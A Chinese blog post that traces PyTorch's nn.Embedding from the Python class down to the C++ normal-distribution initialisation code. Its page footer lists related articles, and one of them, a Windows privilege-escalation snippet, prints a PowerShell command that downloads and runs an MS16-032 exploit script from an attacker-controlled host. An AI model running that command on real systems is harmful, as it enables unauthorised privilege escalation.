Pytorch深度解析:Transformer嵌入层源码逐行解读

前言

本部分博客需要先阅读博客:
《Transformer实现以及Pytorch源码解读(一)-数据输入篇》
作为知识储备。

Embedding使用方式

如下面的代码中所示,embedding一般是先实例化nn.Embedding(vocab_size, embedding_dim)。实例化的过程中输入两个参数:vocab_size和embedding_dim。其中的vocab_size是指输入的数据集合中总共涉及多少个去重后的单词;embedding_dim是指,每个单词你希望用多少维度的向量表示。随后,实例化的embedding在forward中被调用self.embeddings(inputs)。

class Transformer(nn.Module):def __init__(self, vocab_size, embedding_dim, hidden_dim, num_class,dim_feedforward=512, num_head=2, num_layers=2, dropout=0.1, max_len=512, activation: str = "relu"):super(Transformer, self).__init__()# 词嵌入层self.embedding_dim = embedding_dimself.embeddings = nn.Embedding(vocab_size, embedding_dim)self.position_embedding = PositionalEncoding(embedding_dim, dropout, max_len)# 编码层:使用Transformerencoder_layer = nn.TransformerEncoderLayer(hidden_dim, num_head, dim_feedforward, dropout, activation)self.transformer = nn.TransformerEncoder(encoder_layer, num_layers)# 输出层self.output = nn.Linear(hidden_dim, num_class)def forward(self, inputs, lengths):inputs = torch.transpose(inputs, 0, 1)hidden_states = self.embeddings(inputs)hidden_states = self.position_embedding(hidden_states)attention_mask = length_to_mask(lengths) == Falsehidden_states = self.transformer(hidden_states, src_key_padding_mask=attention_mask).transpose(0, 1)logits = self.output(hidden_states)log_probs = F.log_softmax(logits, dim=-1)return log_probs

数据被怎样变换了?

如下图所示,第一个tensor表示input,该input表示一个句子( sentence),只是该句子中的单词用整数进行了代替,相同的整数表示相同的单词。而每个1在embedding之后,变成了相同过的向量。

我们将以上的代码重新的运行一遍,发现表示1的向量改变了,这说明embedding 的过程不是确定的,而是随机的。

数据是怎样被变化的?

Embedding类在调用过程中主要涉及到以下几个核心方法:_
init
,rest_parameters,forward:

Embedding类的初始化过程如下所示。当_weight没有的情况下调用Parameter初始化一个空的向量,该向量的维度与输入数据中的去重单词个数(num_bembeddings)一样。然后调用reset_parameters方法。

 def __init__(self, num_embeddings: int, embedding_dim: int, padding_idx: Optional[int] = None,max_norm: Optional[float] = None, norm_type: float = 2., scale_grad_by_freq: bool = False,sparse: bool = False, _weight: Optional[Tensor] = None,device=None, dtype=None) -> None:factory_kwargs = {'device': device, 'dtype': dtype}super(Embedding, self).__init__()self.num_embeddings = num_embeddingsself.embedding_dim = embedding_dimif padding_idx is not None:if padding_idx > 0:assert padding_idx < self.num_embeddings, 'Padding_idx must be within num_embeddings'elif padding_idx < 0:assert padding_idx >= -self.num_embeddings, 'Padding_idx must be within num_embeddings'padding_idx = self.num_embeddings + padding_idxself.padding_idx = padding_idxself.max_norm = max_normself.norm_type = norm_typeself.scale_grad_by_freq = scale_grad_by_freqif _weight is None:self.weight = Parameter(torch.empty((num_embeddings, embedding_dim), **factory_kwargs))# print("===========================================1")# print(self.weight)#将self.weight进行nornal归一化self.reset_parameters()print("===========================================2")print(self.weight)else:assert list(_weight.shape) == [num_embeddings, embedding_dim], \'Shape of weight does not match num_embeddings and embedding_dim'self.weight = Parameter(_weight)self.sparse = sparse

reset_parameters的实现如下所示,主要是调用了init.norma_方法。

    def reset_parameters(self) -> None:init.normal_(self.weight)self._fill_padding_idx_with_zero()

init.normal_又调用了torch.nn.init中的normal方法。该方法将空的self.weight矩阵填充为一个符合 (0,1)正太分布的矩阵。

N

(

mean

,

std

2

)

.

\mathcal{N}(\text{mean}, \text{std}^2).

N

(

mean

,

std

2

)

.

def normal_(tensor: Tensor, mean: float = 0., std: float = 1.) -> Tensor:r"""Fills the input Tensor with values drawn from the normaldistribution :math:`\mathcal{N}(\text{mean}, \text{std}^2)`.Args:tensor: an n-dimensional `torch.Tensor`mean: the mean of the normal distributionstd: the standard deviation of the normal distributionExamples:>>> w = torch.empty(3, 5)>>> nn.init.normal_(w)"""return _no_grad_normal_(tensor, mean, std)

继续追踪_no_grad_normal_(tensor, mean, std)我们发现,该方法是通过c++实现,所在的源码文件目录为:

namespace torch {
namespace nn {
namespace init {
namespace {
struct Fan {explicit Fan(Tensor& tensor) {const auto dimensions = tensor.ndimension();TORCH_CHECK(dimensions >= 2,"Fan in and fan out can not be computed for tensor with fewer than 2 dimensions");if (dimensions == 2) {in = tensor.size(1);out = tensor.size(0);} else {in = tensor.size(1) * tensor[0][0].numel();out = tensor.size(0) * tensor[0][0].numel();}}int64_t in;int64_t out;
};
Tensor normal_(Tensor tensor, double mean, double std) {NoGradGuard guard;return tensor.normal_(mean, std);
}

forward方法的c++实现如下所示。

torch::Tensor EmbeddingImpl::forward(const Tensor& input) {return F::detail::embedding(input,weight,options.padding_idx(),options.max_norm(),options.norm_type(),options.scale_grad_by_freq(),options.sparse());
}

继续追踪,发现weight中的每个变量被下面的c++代码填充了正太分布的随机数。

void normal_kernel(const TensorBase &self, double mean, double std, c10::optional<Generator> gen) {CPUGeneratorImpl* generator = get_generator_or_default<CPUGeneratorImpl>(gen, detail::getDefaultCPUGenerator());templates::cpu::normal_kernel(self, mean, std, generator);
}

随机数的生成调用如下的代码,首先询问:目前代码是在什么设备上运行,并调用cpu或者gup上的随机数生成方法。

template <typename T>
static inline T * check_generator(c10::optional<Generator> gen) {TORCH_CHECK(gen.has_value(), "Expected Generator but received nullopt");TORCH_CHECK(gen->defined(), "Generator with undefined implementation is not allowed");TORCH_CHECK(T::device_type() == gen->device().type(), "Expected a '", T::device_type(), "' device type for generator but found '", gen->device().type(), "'");return gen->get<T>();
}/*** Utility function used in tensor implementations, which* supplies the default generator to tensors, if an input generator* is not supplied. The input Generator* is also static casted to* the backend generator type (CPU/CUDAGeneratorImpl etc.)*/
template <typename T>
static inline T* get_generator_or_default(const c10::optional<Generator>& gen, const Generator& default_gen) {return gen.has_value() && gen->defined() ? check_generator<T>(gen) : check_generator<T>(default_gen);
}

至此,embedding的每个随机数的生成过程都清楚了。

总结

Embedding的过程,其实就是为每个单词对应一个向量的过程。该向量为(0,1)正太分布,该矩阵在Embedding的实例化过程就已经被初始化完成。在调用Embedding示例的时候即forward开始工作的时候,只是做了一个匹配的过程,也就是将<字典,向量>的对应关系应用到input上。前期解读该部分源码的困惑是一只找不到forward中的对应处理过程,以为embedding的处理逻辑是在forward的阶段展开的,显然这种想法是不对的。Pytorch的架构设计的的确优雅!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/28943.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

双绞线(网线)的制作与测试

实验目的 1、熟悉常用双绞线&#xff08;网线&#xff09;及其制作工具的使用&#xff1b; 2、掌握非屏蔽双绞线的直通线、交叉线的制作及连接方法&#xff1b; 3、掌握双绞线连通性的测试。 设备要求&#xff1a;RJ45压线钳&#xff0c;RJ45水晶头&#xff0c;UTP线缆&…

小白 | windows提权

1.CVE-2016-0099 (MS16-032) 这是一个Windows内核特权提升漏洞&#xff0c;利用该漏洞可以获得系统权限。 # 使用公开的POC进行利用&#xff0c;如 powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString(http://<attacker_ip>/Invoke-MS16-032.ps1)…

LSTM模型预测时间序列

长短期记忆模型(Long Short-Term Memory, LSTM)&#xff0c;是一种特殊的循环神经网络&#xff0c;能够学习长期依赖性。长短期记忆模型在各种各样的问题上表现非常出色&#xff0c;现在被广泛使用&#xff0c;例如&#xff0c;文本生成、机器翻译、语音识别、时序数据预测、生…

经典老款双运放NE5532

1 产品特点 等效输入噪声电压&#xff1a; 5nV H z \sqrt[]{ Hz} Hz ​&#xff08;典型值&#xff0c;1 kHz&#xff09; 单位增益带宽&#xff1a;10 MHz &#xff08;典型值&#xff09; 共模抑制比&#xff1a;100 dB &#xff08;典型值&#xff09; 高直流电压增益&…

【Python高级编程】Pickle实现AI算法训练的权重数据的保存

任务描述 代码实现 import pickle import time import os import numpy as np# 模拟耗时的权重计算过程 def calculate_weights():print("开始计算权重...")time.sleep(5) # 模拟耗时操作&#xff0c;暂停5秒以模拟计算过程weights np.random.rand(10, 10) # 随机…

AI产品经理,应掌握哪些技术?

美国的麻省理工学院&#xff08;Massachusetts Institute of Technology&#xff09;专门负责科技成果转化商用的部门研究表明&#xff1a; 每一块钱的科研投入&#xff0c;需要100块钱与之配套的投资&#xff08;人、财、物&#xff09;&#xff0c;才能把思想转化为产品&…

flutter开发实战-创建一个微光加载效果

flutter开发实战-创建一个微光加载效果 当加载数据的时候&#xff0c;loading是必不可少的。从用户体验&#xff08;UX&#xff09;的角度来看&#xff0c;最重要的是向用户展示加载正在进行。向用户传达数据正在加载的一种流行方法是在与正在加载的内容类型近似的形状上显示带…

货代小白快来收藏‼️普货与非普货的区别

普货是指不属于以下类别的普通货物 危险品 冷冻/冷藏品 违禁品 仿牌货 敏感货 危险品 危险品具体分为九类&#xff1a; 爆炸品 压缩气体 易燃液体 易燃固体、易燃物品和遇湿易燃物品 氧化剂和有机氧化物 有毒和感染性物品 放射性 腐蚀性 杂类 冷冻/冷藏品 主要是指以食品为主的…

简述spock以及使用

1. 介绍 1.1 Spock是什么&#xff1f; Spock是一款国外优秀的测试框架&#xff0c;基于BDD&#xff08;行为驱动开发&#xff09;思想实现&#xff0c;功能非常强大。Spock结合Groovy动态语言的特点&#xff0c;提供了各种标签&#xff0c;并采用简单、通用、结构化的描述语言…

php配合fiddler批量下载淘宝天猫商品数据分享

有个做电商的朋友问我,每次上款,需要手动去某宝去搬运商品图片视频,问我能不能帮忙写个脚本,朋友开口了,那就尝试一下 首先打开某宝,访问一款商品,找出他的数据来源 通过观察我们发现主图数据来这个接口输出 h5api.m.taobao.com/h5/mtop.taobao.pcdetail.data.get/1.0 …

如何学习创建和使用 Java 归档(JAR)文件

1. 简介 JAR&#xff08;Java ARchive&#xff09;文件是一种用于打包多个Java类、资源文件和元数据的压缩文件格式。它在Java开发和发布过程中扮演着重要角色。通过使用JAR文件&#xff0c;开发者可以将应用程序的所有组件打包在一个文件中&#xff0c;方便分发和部署。 2. …

世界森林覆盖率分布图

原文链接https://mp.weixin.qq.com/s?__bizMzUyNzczMTI4Mg&mid2247680287&idx1&sn6ac57fa7472fc58cad1d5ab11b1d6b3b&chksmfa775e22cd00d7341e4f59d52221fb7f9a8e2d83602ab58719481af66b2f3b153c57f01c68bb&token808263816&langzh_CN&scene21#wec…

开源语音合成模型ChatTTS本地部署结合内网穿透实现远程访问

文章目录 前言1. 下载运行ChatTTS模型2. 安装Cpolar工具3. 实现公网访问4. 配置ChatTTS固定公网地址 前言 本篇文章就教大家如何快速地在Windows中本地部署ChatTTS&#xff0c;并且我们还可以结合Cpolar内网穿透实现公网随时随地访问ChatTTS AI语言模型。 最像人声的AI来了&a…

Airflow任务流调度

0 前言 Airflow是Airbnb内部发起的一个工作流管理平台。使用Python编写实现的任务管理、调度、监控工作流平台。Airflow的调度依赖于crontab命令&#xff0c;与crontab相比&#xff0c;Airflow可以方便地查看任务的执行状况&#xff08;执行是否成功、执行时间、执行依赖等&…

基于OCC+OSG的读取IGS模型显示其装配以及模型颜色

一般来说&#xff0c;读取STP模型会解析其装配结构&#xff0c;而读取IGS模型时候一般不这么做&#xff0c;因为IGS的每个部件大多是面片&#xff0c;而非一个实体模型&#xff0c;所以比如一些开源软件&#xff0c;比如Freecad等都是直接将模型作为一个整体并且在模型树上只显…

Elixir学习笔记——try, catch, and rescue

Elixir 有三种错误机制&#xff1a;errors, throws, and exits。在本章中&#xff0c;我们将探索每种机制&#xff0c;并说明何时应使用它们。 Errors 当代码中发生异常时&#xff0c;就会使用错误&#xff08;或异常&#xff09;。可以通过尝试将数字添加到原子来检索示例错…

生活好物:日常更精彩

我们的日用杂货店&#xff0c;是生活美学的聚集地。这里汇聚了各式各样的生活用品&#xff0c;每一件都蕴含着对生活的热爱与追求。 走进我们的日用杂货店&#xff0c;仿佛打开了一个充满生活气息的宝藏盒。从厨房的锅碗瓢盆&#xff0c;到浴室的洗漱用品&#xff0c;再到客厅的…

6.17 作业

使用qt实现优化自己的登录界面 要求&#xff1a; 1. qss实现 2. 需要有图层的叠加 &#xff08;QFrame&#xff09; 3. 设置纯净窗口后&#xff0c;有关闭等窗口功能。 4. 如果账号密码正确&#xff0c;则实现登录界面关闭&#xff0c;另一个应用界面显示。 第一个源文件 …

9.无代码爬虫软件做网页数据抓取流程——弹出窗口的移除

首先&#xff0c;多数情况下免费版本的功能&#xff0c;已经可以满足绝大多数采集需求&#xff0c;想了解八爪鱼采集器版本区别的详情&#xff0c;请访问这篇帖子&#xff1a; https://blog.csdn.net/cctv1123/article/details/139581468 八爪鱼采集器免费版和个人版、团队版下…

反射复习(java)

文章目录 反射机制的作用反射机制的原理加载机制详细解释 获取 Class 对象反射获取构造方法&#xff1a;获取 Class 对象里面 Constructor 对象反射获取成员变量&#xff1a;获取Class 对象里面的 Field 对象反射获取成员方法&#xff1a;获取 Class 对象里的 Method 对象其他常…